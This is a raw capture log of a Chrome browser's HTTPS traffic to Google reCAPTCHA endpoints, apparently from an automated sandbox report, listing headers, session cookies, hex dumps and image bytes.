                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC5814OUTData Raw: 76 3d 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 26 63 3d 30 33 41 46 63 57 65 41 35 30 59 57 6a 74 32 4f 4d 67 63 4f 38 42 66 4c 78 4c 6b 58 53 4a 71 51 59 6d 41 4f 71 6b 46 61 31 73 47 37 69 63 43 50 49 58 31 75 67 4b 59 33 39 38 72 31 78 68 4c 74 59 57 71 4a 5a 33 48 5f 4b 30 65 49 4c 6a 70 71 6f 66 51 4e 6e 58 42 50 4d 77 64 35 76 64 50 56 62 46 63 4b 74 7a 30 49 42 47 61 34 71 34 73 6a 6b 65 5a 47 5a 77 6d 67 71 41 73 56 44 48 75 6b 64 41 65 35 58 56 79 45 48 62 6c 48 76 6e 69 51 74 74 61 6e 6a 37 4f 67 54 6a 4d 70 52 43 48 46 39 33 4f 62 6f 30 6c 45 35 6b 76 35 66 47 5a 79 6c 6e 56 53 52 42 6f 43 44 75 66 79 67 79 76 38 70 4d 45 33 47 69 52 77 63 47 37 61 57 50 6a 61 68 51 55 67 35 47 74 41 57 65 50 57 45 55 43 31 79 2d
                                                                                                                                                                                                                                                                  Data Ascii: v=-ZG7BC9TxCVEbzIO2m429usb&c=03AFcWeA50YWjt2OMgcO8BfLxLkXSJqQYmAOqkFa1sG7icCPIX1ugKY398r1xhLtYWqJZ3H_K0eILjpqofQNnXBPMwd5vdPVbFcKtz0IBGa4q4sjkeZGZwmgqAsVDHukdAe5XVyEHblHvniQttanj7OgTjMpRCHF93Obo0lE5kv5fGZylnVSRBoCDufygyv8pME3GiRwcG7aWPjahQUg5GtAWePWEUC1y-
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC694INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:19 GMT
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC684INData Raw: 31 37 61 35 0d 0a 29 5d 7d 27 0a 5b 22 64 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 34 6a 68 72 49 37 6f 42 5a 53 4f 35 49 53 61 71 30 46 6d 41 65 43 5a 50 6c 33 5a 62 58 32 55 7a 58 4d 51 6d 59 74 73 79 79 6d 6a 38 71 59 36 63 74 73 44 74 63 55 75 46 42 4d 39 42 6d 47 71 65 5f 74 50 33 37 42 7a 65 2d 76 62 43 62 42 32 35 7a 79 6f 39 6b 73 54 75 64 6f 41 30 64 48 51 73 49 68 63 68 34 42 74 68 57 69 38 32 33 41 38 4e 76 61 64 6a 67 76 67 37 70 74 54 6b 62 48 53 76 66 34 7a 6d 77 74 58 54 44 54 30 68 65 6b 7a 68 4a 51 79 59 6d 74 45 53 48 70 69 38 7a 6c 63 63 7a 62 36 73 62 77 4d 39 49 47 73 6a 46 65 68 4b 6b 79 51 4c 4b 72 4a 70 34 43 37 79 36 32 67 77 66 6f 44 67 31 36 35 74 6a 49 64 34 79 56 31 33 4f 56 7a 4b 4e 62 31 5f 4a 77 44 2d 4a 33 35 6a 71 30
                                                                                                                                                                                                                                                                  Data Ascii: 17a5)]}'["dresp","03AFcWeA4jhrI7oBZSO5ISaq0FmAeCZPl3ZbX2UzXMQmYtsyymj8qY6ctsDtcUuFBM9BmGqe_tP37Bze-vbCbB25zyo9ksTudoA0dHQsIhch4BthWi823A8Nvadjgvg7ptTkbHSvf4zmwtXTDT0hekzhJQyYmtESHpi8zlcczb6sbwM9IGsjFehKkyQLKrJp4C7y62gwfoDg165tjId4yV13OVzKNb1_JwD-J35jq0
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC1378INData Raw: 50 6e 4c 54 63 75 77 35 4f 39 4d 37 62 32 44 51 33 46 4a 39 5f 67 34 57 48 4e 2d 6a 78 33 4a 6e 61 67 56 4d 78 64 48 78 58 44 49 58 4c 2d 4c 77 6d 55 45 70 61 65 74 74 71 30 66 43 6b 58 44 56 47 54 41 44 5f 78 32 67 41 62 57 5f 5f 75 64 38 77 72 66 58 73 4f 46 2d 31 4c 67 71 56 2d 74 73 49 53 78 31 50 31 41 73 49 61 31 42 61 4e 44 4b 53 43 30 2d 6c 79 37 52 6b 4f 6a 32 71 79 73 46 47 48 31 4a 41 6e 64 31 64 7a 38 31 66 4c 45 2d 6f 75 68 49 57 64 53 69 70 67 35 56 45 4a 5f 68 36 36 44 56 78 57 41 5f 4e 38 6f 41 57 6f 63 71 56 46 51 78 52 5f 69 71 4b 43 58 4a 39 4d 36 65 36 44 44 79 75 71 48 43 63 7a 67 53 66 66 4d 56 76 6b 50 79 59 4b 54 37 70 58 43 33 65 31 6d 49 4b 4c 39 54 65 75 49 73 74 45 51 70 30 38 68 34 66 53 36 7a 4f 67 34 53 61 5a 52 6e 62 74 38
                                                                                                                                                                                                                                                                  Data Ascii: PnLTcuw5O9M7b2DQ3FJ9_g4WHN-jx3JnagVMxdHxXDIXL-LwmUEpaettq0fCkXDVGTAD_x2gAbW__ud8wrfXsOF-1LgqV-tsISx1P1AsIa1BaNDKSC0-ly7RkOj2qysFGH1JAnd1dz81fLE-ouhIWdSipg5VEJ_h66DVxWA_N8oAWocqVFQxR_iqKCXJ9M6e6DDyuqHCczgSffMVvkPyYKT7pXC3e1mIKL9TeuIstEQp08h4fS6zOg4SaZRnbt8
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC1378INData Raw: 6c 7a 70 66 43 70 66 4c 5f 41 57 2d 31 4d 49 6a 30 34 5f 6b 69 42 49 51 32 76 4d 61 41 53 63 47 46 42 48 50 5a 36 4a 6a 56 52 2d 36 76 48 72 6e 4f 4e 61 56 78 6e 53 48 70 79 64 69 77 53 73 4f 5f 7a 51 31 46 63 47 4c 72 42 51 79 6d 6d 34 65 5f 48 32 46 34 67 73 41 4e 62 37 4f 39 39 77 6a 45 76 36 5f 53 4b 50 6f 66 33 44 69 38 47 6c 4f 62 5a 44 6f 46 48 66 53 77 47 76 6d 64 71 6b 66 31 63 73 52 45 7a 70 67 67 74 50 45 2d 62 43 48 6a 33 56 49 50 71 37 35 7a 4d 74 56 55 45 52 45 56 46 5f 67 63 62 65 44 48 68 76 56 68 34 5a 47 58 49 4b 53 42 32 70 49 62 4c 63 6d 37 42 4c 54 57 64 57 78 69 57 65 71 53 59 37 4a 57 4d 65 30 46 77 73 45 43 38 68 7a 35 51 70 2d 49 6f 78 6d 6b 45 30 6f 79 5a 44 58 62 34 7a 72 53 66 44 56 55 75 56 61 6a 64 45 5f 6f 6b 35 77 32 73 54
                                                                                                                                                                                                                                                                  Data Ascii: lzpfCpfL_AW-1MIj04_kiBIQ2vMaAScGFBHPZ6JjVR-6vHrnONaVxnSHpydiwSsO_zQ1FcGLrBQymm4e_H2F4gsANb7O99wjEv6_SKPof3Di8GlObZDoFHfSwGvmdqkf1csREzpggtPE-bCHj3VIPq75zMtVUEREVF_gcbeDHhvVh4ZGXIKSB2pIbLcm7BLTWdWxiWeqSY7JWMe0FwsEC8hz5Qp-IoxmkE0oyZDXb4zrSfDVUuVajdE_ok5w2sT
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC1378INData Raw: 72 63 65 42 59 50 53 5f 74 51 34 45 77 5a 45 43 69 36 50 72 78 4f 37 41 48 5f 62 78 75 2d 66 7a 43 6f 70 79 77 4d 75 41 6c 56 78 43 4a 43 31 70 4f 7a 4a 68 41 37 44 6d 4f 54 5a 36 46 44 6f 61 46 71 72 63 62 70 74 46 68 52 6d 58 50 5a 4e 35 6c 4e 44 51 55 37 71 52 45 39 31 38 50 56 39 76 31 67 36 30 5f 56 74 2d 65 5a 58 4d 6a 33 4c 37 71 45 72 63 49 64 56 4a 42 52 68 6c 6c 69 6f 44 58 51 77 7a 65 4d 31 79 75 56 43 4f 59 71 5a 42 5a 55 4a 6e 33 51 33 77 56 68 59 4b 59 78 35 4b 38 4d 54 58 72 6b 43 71 36 35 47 34 53 54 64 4e 59 32 63 45 6d 53 4d 35 6f 58 56 61 76 59 39 63 64 65 69 38 62 42 71 5f 47 76 36 4a 59 41 34 59 39 58 6b 68 61 58 65 34 54 34 79 35 68 5f 32 51 47 75 31 58 69 62 37 69 41 58 2d 43 79 6e 66 43 46 56 6e 7a 4e 45 67 39 74 7a 44 6b 33 7a 37
                                                                                                                                                                                                                                                                  Data Ascii: rceBYPS_tQ4EwZECi6PrxO7AH_bxu-fzCopywMuAlVxCJC1pOzJhA7DmOTZ6FDoaFqrcbptFhRmXPZN5lNDQU7qRE918PV9v1g60_Vt-eZXMj3L7qErcIdVJBRhllioDXQwzeM1yuVCOYqZBZUJn3Q3wVhYKYx5K8MTXrkCq65G4STdNY2cEmSM5oXVavY9cdei8bBq_Gv6JYA4Y9XkhaXe4T4y5h_2QGu1Xib7iAX-CynfCFVnzNEg9tzDk3z7
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC1243INData Raw: 53 63 35 6f 75 5a 56 6c 6b 64 4d 61 36 38 31 47 5a 45 68 5a 6a 35 50 70 6f 58 36 43 41 56 50 73 50 46 75 74 78 64 39 78 52 32 46 31 70 6b 32 41 5a 5a 37 4c 38 69 58 74 56 58 52 74 32 62 47 71 53 68 4c 47 43 75 69 75 66 5a 46 4b 56 78 50 76 76 51 63 5f 5f 55 6e 66 54 30 5f 52 68 75 4d 59 69 33 56 30 73 4e 64 30 69 72 64 73 57 5f 69 4b 6e 65 4e 63 67 4c 6f 53 66 4d 6f 4a 33 65 6f 73 4e 46 6a 5f 6d 45 63 56 37 58 62 6e 5a 59 6c 5a 6b 55 4b 4e 49 79 6d 4a 4b 36 72 4c 62 6b 74 75 42 68 38 62 78 67 72 75 6b 56 63 53 57 34 79 42 71 74 39 4c 48 63 58 72 43 46 6e 64 2d 43 62 64 59 59 6e 6c 41 65 4e 2d 45 50 68 74 37 4f 6d 6f 53 6b 64 7a 70 56 31 50 68 75 6a 5f 39 61 6e 39 63 32 36 33 65 70 57 79 75 65 62 6d 78 59 31 34 34 65 64 67 54 4a 73 43 46 6c 63 57 52 6e 32
                                                                                                                                                                                                                                                                  Data Ascii: Sc5ouZVlkdMa681GZEhZj5PpoX6CAVPsPFutxd9xR2F1pk2AZZ7L8iXtVXRt2bGqShLGCuiufZFKVxPvvQc__UnfT0_RhuMYi3V0sNd0irdsW_iKneNcgLoSfMoJ3eosNFj_mEcV7XbnZYlZkUKNIymJK6rLbktuBh8bxgrukVcSW4yBqt9LHcXrCFnd-CbdYYnlAeN-EPht7OmoSkdzpV1Phuj_9an9c263epWyuebmxY144edgTJsCFlcWRn2
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  68192.168.2.1649796142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC612OUTGET /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:19 GMT
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Allow: POST
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC635INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                                                                                                                                                                  Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC1036INData Raw: 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67
                                                                                                                                                                                                                                                                  Data Ascii: idth:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#log
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  69192.168.2.1649798142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC1190OUTGET /recaptcha/api2/payload?p=06AFcWeA7xha3gxL0LyuWF8xqJSoCy9aQ-CZnuJeBttoz9_4u-0dr2ooWnm-XyId997e5APa7ifIuB7pzFl0Ld1JHgMi727Mh_bXvh33TfwJ0QP4-jBMaOIGMY9nVllrV0ucFNLw_YWa5NAg0HBGl7nBIePGFmWIlko0bVYW4FzRKb_r8YRN5GuA3Fdmj1g-URC-WVZUOlHiPBV-qRB8c5HFucXS6ADUe7iw&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=e16caff0ee415144 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:19 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:19 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC697INData Raw: 31 35 30 34 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: 1504JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC1378INData Raw: 68 23 24 0f 5e 9d aa 79 bc c7 70 e9 80 01 6e 43 f0 54 90 a0 af 38 2d 95 03 92 3a 00 0e 2b a7 da 3b 5d bf eb f0 38 e5 1d 5f 6f eb ef f2 e8 57 47 88 5c bb 48 f9 67 8d 59 37 3e 18 0f ba 0f b1 f9 40 ce 72 31 c5 36 da 2d 81 4a 22 4c 19 4c 60 aa 00 18 92 08 40 01 39 53 b8 64 0e a4 8e 7a 55 89 a0 2f 02 31 86 52 8d 9c 01 96 52 55 5b 2a 46 01 ce 3f af 07 19 2c 68 b7 2b c4 22 cb e7 13 6f 18 de bb 8e 41 00 9c 0c 10 c7 1c 36 e5 e9 d0 d7 32 6f 57 fd 7f 5f 88 92 72 df f1 ff 00 86 fe 99 5c a2 22 5b ac b3 f9 b1 c8 a8 b1 23 2f 0e 3e 61 c2 8c 82 4e e3 df 80 c3 8f 48 62 b7 92 65 68 9d bc e9 c1 c9 6d bf 3b 10 30 84 85 62 31 db 00 e3 24 e7 3d b4 1e 41 2b cc 82 07 74 62 e5 1d 48 2c c1 88 e8 07 61 f3 64 73 c8 23 38 5a 22 43 fb b7 5d d3 10 49 49 23 50 c5 bb 13 8e 3e 5f bb c6 07
                                                                                                                                                                                                                                                                  Data Ascii: h#$^ypnCT8-:+;]8_oWG\HgY7>@r16-J"LL`@9SdzU/1RRU[*F?,h+"oA62oW_r\"[#/>aNHbehm;0b1$=A+tbH,ads#8Z"C]II#P>_
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC1378INData Raw: a2 39 c6 78 e4 30 cf b9 3d f3 45 47 34 1e bc ff 00 8f fc 12 55 0a b6 d2 17 5f 2f f2 3e 7a d4 fc 77 e2 eb ab 68 ed 21 92 c7 4d 2a a5 d3 cb 8d cb ab 85 da 77 06 27 f8 48 eb f8 74 34 db 3f 19 78 9e 0d 3e 2d 3e ce f2 ca 35 88 0c 34 56 b8 67 eb 81 96 c8 07 e6 e9 ec 6b 22 da d6 0b e8 e4 87 7c 88 84 12 08 4e 62 2b 82 1b 39 c0 c6 73 92 7d eb 2f 52 d0 e4 95 e6 bc b3 bb 8d 92 16 da e3 cd fb a7 24 e0 0e 37 74 03 8c 74 fc 6b 8f 9a 2d 9d 8e 32 d5 a7 a6 9f e7 a9 d7 cd e3 1f 12 4b b0 9d 69 8c 2e ad 21 45 82 3e 07 d4 ae 41 e7 b0 3f 9d 24 ba ff 00 8a a4 b6 64 bb f1 04 f1 b2 92 c7 72 a2 af 43 8e 00 04 00 02 fd 08 1f 5a f3 66 b2 b8 b4 8d e2 bb 46 d8 46 13 0d 92 a4 9d b8 1e e3 69 cf af d2 a1 0b 3c 0c b9 47 dd bc a6 dd c5 4f 18 1c 60 60 e7 2b f9 0f 4a 6e 95 b6 fd 0c 75 b6 8f
                                                                                                                                                                                                                                                                  Data Ascii: 9x0=EG4U_/>zwh!M*w'Ht4?x>->54Vgk"|Nb+9s}/R$7ttk-2Ki.!E>A?$drCZfFFi<GO``+Jnu
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC1378INData Raw: 94 1d 07 60 3a d1 55 8e a9 16 9c 7c 87 b6 89 18 8d c7 39 20 f6 c8 c0 18 1c 74 a2 aa 34 67 25 74 df dc bf cc de 13 6a 2a d1 5f 3b 1d 56 a3 15 f2 66 59 96 76 de 3c c4 90 02 00 23 3c fc dd 3b 7a 9e 48 aa e4 db 05 21 98 f9 7b f2 4c ab 9f 2f d7 2d d4 e7 07 8f 6a ea 67 d2 26 92 fc ce b0 43 20 18 c1 93 ab f2 49 ef c0 03 1c e7 d7 8e d5 51 3c 2a 91 6d 9e d9 bc ac 38 00 83 d0 f0 46 14 e7 20 1e 7a 0e f5 e5 f3 ae 5f eb fa fe 99 bb bb df f5 fb ba db af ce fe 68 e7 2f 65 82 14 c3 c0 db e2 90 04 1e 66 d6 e4 f0 46 47 b1 c6 7f 3e 95 9d 3c 92 c5 34 73 86 25 d8 3f 96 1c 67 0b 9c 11 80 d8 1d ba 7a 57 67 73 e1 49 2e 24 7f b5 b4 72 34 67 68 7f 30 6e 45 c9 05 98 01 8c f3 9f cf d2 aa df 78 26 ea 4d 4a 59 61 78 e2 88 c9 8f 2a 3d d8 44 c2 85 f9 87 51 9c 7b f1 ef 55 09 c5 6e ed fd
                                                                                                                                                                                                                                                                  Data Ascii: `:U|9 t4g%tj*_;VfYv<#<;zH!{L/-jg&C IQ<*m8F z_h/efFG><4s%?gzWgsI.$r4gh0nEx&MJYax*=DQ{Un
